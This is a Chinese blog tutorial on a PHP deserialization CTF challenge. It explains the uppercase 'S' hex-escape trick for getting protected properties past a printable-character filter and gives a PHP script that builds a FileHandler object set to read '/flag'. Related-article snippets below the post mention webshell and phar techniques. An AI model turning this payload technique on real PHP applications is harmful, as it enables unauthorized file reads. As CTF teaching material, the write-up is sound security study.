PHP反序列化3(属性绕过)

于 2024-09-27 15:03:17 发布
阅读量152 收藏
点赞数 5
分类专栏: PHP反序列化 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81328699/article/details/142593932
版权

考点3:私有属性绕过+十六进制绕过

<aside> 💡

十六进制绕过

</aside>

大写 S模式下,字符可以用/和十六进制表示。%00即chr(0)就可以用\00表示。

<aside> 💡

部分例题

</aside>

 <?php

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;
............
............
............
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

构造payload:

<?php
class FileHandler {

   protected  $op = 2;
   protected  $filename = "/flag";
   protected  $content = "aaa";
}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

$a = new FileHandler();
$b = serialize($a);
$b=str_replace(chr(0), '\\00', $b);
$b=str_replace('s:5', 'S:5', $b);
$b=str_replace('s:11', 'S:11', $b);
$b=str_replace('s:10', 'S:10', $b);
echo $b;

火红的小辣椒
关注
专栏目录
PHP序列化、反序列化
2401_82985722的博客
06-05 1265
1.对象被创建时触发__construct()方法,对象使用完被销毁时触发__destruct()方法。2.对象被序列化时触发了__sleep(),字符串被反序列化时触发了__wakeup()//大写字母O表示对象,4是类名长度,test为类名,表示该类有3个成员属性。类型:长度:“值”…admin=admin,passwd=ctf时得到flag,序列化p。admin=admin,passwd=wllm得到flag,序列化p。4.$a->h()调用了不存在的方法触发了__call()方法。
php反序列化construct绕过,PHP反序列化漏洞(1)
weixin_39730801的博客
03-11 1758
PHP反序列化漏洞(1)背景Serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击。常见方法__construct()//创建对象时触发__destruct() //对象被销毁时触...
PHP序列化及反序列化绕过
qq_46041723的博客
11-18 3466
序列化和反序列化绕过前言序列化和反序列化序列化反序列化反序列化绕过ctf题目实例 前言 本菜鸡本着菜死人不偿命的觉悟,接着迈向了ctf的世界。 废话不多说,今天来谈一下PHP的序列化和反序列化还有一些绕过姿势 序列化和反序列化 序列化 在PHP里面存在一个serialize方法来实现序列化功能。 Serializable { /* 方法 */ abstract public serialize ( ) : string abstract public unserialize ( string $seria
绕过__wakeup() 反序列化 合集
Jay17的博客
08-24 1494
绕过__wakeup() 反序列化 合集
phar反序列化绕过
2401_82985722的博客
06-21 1148
phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件。可以把多个php文件存放至同一个文件中,无需解压,PHP就可以进行访问并执行内部语句。一般使用 文件包含中的,phar://伪协议,读取.phar文件文件包含之——phar伪协议不管后缀是什么,都会当做压缩包来解压?file=phar://压缩包/内部文件e.g 将一句话木马(shell.php)压缩成压缩包形式(shell.zip),将压缩包后缀改为.jpg(shell.jpg)?
php反序列化绕过,浅谈php反序列化漏洞
weixin_42513988的博客
03-19 374
关于php反序列化漏洞要先说到序列化和反序列化的两个函数,即:serialize()和unserialize()。简单的理解:序列化就是将一个对象变成字符串反序列化是将字符串恢复成对象这样做的意义是为了将一个对象通过可保存的字节方式存储起来,同时就可以将序列化字节存储到数据库或者文本当中,当需要的时候再通过反序列化获取 。另外我们提一下 2016 年的 CVE-2016-7124 绕过 __...
反序列化__wakeup()绕过
csjjjd的博客
01-24 749
这里因为flag在flag.php但是我只要进行反序列化就会触发wake()魔术方法,使file=index.php,这不是我们要的,所以必须绕过它,这里直接复制前面代码,把file改为flag.php,进行反序列化,得到正常的pop链,之后再把。后面的数字加个正号,然后把属性加一,接下来URL编码就可以绕过。但是限制很大,5
php反序列化construct绕过,php反序列化漏洞绕过魔术方法 __wakeup(示例代码)
weixin_35214204的博客
03-11 1216
0x01 前言前天学校的ctf比赛,有一道题是关于php反序列化漏洞绕过wakeup,最后跟着大佬们学到了一波姿势。。0x02 原理序列化与反序列化简单介绍序列化:把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等 函数 : serialize()反序列化:恢复原先被序列化的变量 函数: unserialize()1 ...
php反序列化绕过,【技术分享】PHP反序列化漏洞
weixin_36239768的博客
03-19 492
前言序列化给我们传递对象提供了一种简单的方法serialize()将一个对象转换成一个字符串unserialize()将字符串还原为一个对象。此类函数的使用本身没有危害,但是传入反序列化函数的字符串用户可控的时候就会存在漏洞——PHP对象注入正文POP链序列化的关键在于能够在目标代码当中找到一条可以控制的POP链,POP链就是class A调用了class B的方法,class B还调用了其他方法...
渗透测试-PHP反序列化绕过
cdyunaq的博客
04-26 4505
最简单的反序列化 require_once('flag.php'); highlight_file(__FILE__); classA{ private$user='test'; function__destruct(){ ...
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 3930
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
21-3 PHP反序列化漏洞-魔术方法绕过
weixin_43263566的博客
01-17 659
启动靶场 -> 在浏览器打开链接(这个靶场平台比较良心不用花钱,有些平台按分钟收钱,时间一到靶场不续费就自动关闭)先进行进行收集,根据页面提示网站备份,我们可以通过目录探测方式找到备份文件,并根据文件进行审计等后续操作,以达到读取flag文件的目的。在PHP中,__wakeup()是一个魔术方法,用于在反序列化对象时自动调用。来进行绕过,通过添加位置来改变类名的个数。或 搜索: “[极客大挑战 2019]PHP”:指定排除的HTTP状态码,以逗号分隔。
[NISACTF 2022]babyserialize - 反序列化(waf绕过)【*】
oZuoShen123的博客
10-07 1040
1、分析链条和属性   链条:`TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)`   属性:`TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)`
【攻防世界】十二 --- unserialize3 --- php反序列化
qq_43168364的博客
12-25 524
题目 — unserialize3 一、writeup 一道php反序列化的题 关键点: 当审出存在反序列化漏洞时,我们将对应的那个类拿出到自己的php环境中,先用恶意字符串实例化该类然后用serialize()函数,进行序列化,将序列化好的东西抛出到环境中即可造成反序列化漏洞 当$flag='111’是可以看到flag,通过?code查询字符串来传入需要反序列化的字符串 反序列时会自动调用__wakeup() 函数,导致程序结束执行,因此要绕过 __wakeup() 函数(绕过的方法在知识点中有介绍)
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
软希网分享源码的博客
09-23 472
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
PHP中error_reporting函数作用
sheji888的专栏
09-24 717
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
web平台搭建-LAMP(CentOS-7)
gsdgdg00的博客
09-24 673
一. 准备工作环境要求:操作系统:CentOS 7.X 64位网络配置:nmtui字符终端图形管理工具或者直接编辑配置文件关闭SELinux和firewalld防火墙防火墙:临时关闭:systemctl stop firewalld永久关闭:systemctl disable firewalld。
php中打印函数
最新发布
09-24 319
PHP中,打印函数主要用于输出或显示数据。常用的打印函数包括:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值